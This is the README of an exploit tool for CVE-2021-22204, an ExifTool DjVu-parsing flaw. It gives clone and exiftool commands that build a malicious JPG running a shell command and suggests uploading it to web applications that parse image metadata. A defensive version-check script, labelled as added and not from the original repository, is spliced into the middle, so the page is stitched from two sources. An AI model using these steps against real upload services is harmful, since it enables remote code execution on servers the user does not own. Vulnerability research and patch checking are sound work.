JPEG_RCE

ExifTool bug that leads to RCE

CVE-2021-22204 - RCE


*REFERENCE*


Related HackerOne report: https://hackerone.com/reports/1154542

VULNERABILITY

ExifTool 7.44 to 12.23 has a bug in the DjVu module which allows for arbitrary code execution when parsing malicious images.

REQUIREMENTS

If you are using another image, it should be a valid JPEG/JPG file.
You can check that with exiftool.
The metadata should be:
MIME Type : image/jpeg

EXPLOIT VECTOR

If a web application has an image upload feature and parses the metadata of the uploaded image file using exiftool, you can try this exploit against it.

NOTE

The exiftool version should be between 7.44 and 12.23.
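
A check a defender can run on a host or container image to see whether the installed ExifTool falls in the affected range stated above. This is an added example, not part of the original repository; the function names are hypothetical, and it assumes ExifTool's usual MAJOR.MINOR version string with a two-digit minor, as printed by exiftool -ver.

```shell
#!/bin/sh
# Added example (not from the JPEG_RCE repository). Function names are
# hypothetical. Range 7.44-12.23 is the affected range stated above.

# Turn "12.23" into 1223. Assumes ExifTool's MAJOR.MINOR format with a
# two-digit minor; anything else is rejected rather than treated as safe.
exiftool_ver_to_int() {
    case "$1" in
        "" | *[!0-9.]* | *.*.* | .* | *.) return 2 ;;
        *.*) ;;
        *) return 2 ;;
    esac
    _major=${1%%.*}
    _minor=${1#*.}
    [ "${#_minor}" -eq 2 ] || return 2
    # Strip leading zeros so values like "08" are not parsed as octal.
    _major=${_major#"${_major%%[!0]*}"}
    _minor=${_minor#0}
    echo $(( ${_major:-0} * 100 + ${_minor:-0} ))
}

# 0 = inside 7.44..12.23 (inclusive), 1 = outside, 2 = unparseable.
exiftool_is_affected() {
    _v=$(exiftool_ver_to_int "$1") || return 2
    [ "$_v" -ge 744 ] && [ "$_v" -le 1223 ]
}

# Check a specific binary ($1, default: exiftool on PATH) and report.
check_installed_exiftool() {
    _bin=${1:-exiftool}
    command -v "$_bin" >/dev/null 2>&1 || { echo "not found: $_bin"; return 3; }
    _ver=$("$_bin" -ver 2>/dev/null) || _ver=""
    _rc=0
    exiftool_is_affected "$_ver" || _rc=$?
    case $_rc in
        0) echo "AFFECTED: $_bin $_ver is within 7.44-12.23, upgrade it" ;;
        1) echo "ok: $_bin $_ver is outside 7.44-12.23" ;;
        *) echo "unknown version string from $_bin: '$_ver'" ;;
    esac
    return "$_rc"
}

# Usage: check_installed_exiftool /usr/bin/exiftool
```

Run it against every exiftool binary that an upload pipeline can reach, including copies bundled inside application images, since an unparseable version (return code 2) should be investigated rather than assumed safe.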

COMMAND (exploit)

git clone https://github.com/OneSecCyber/JPEG_RCE.git

cd JPEG_RCE

exiftool -config eval.config runme.jpg -eval='system("ls -la")'

This will create a malicious JPG file.
Upload the file or run the file on your local system to see the magic:

exiftool runme.jpg

POC

Watch the video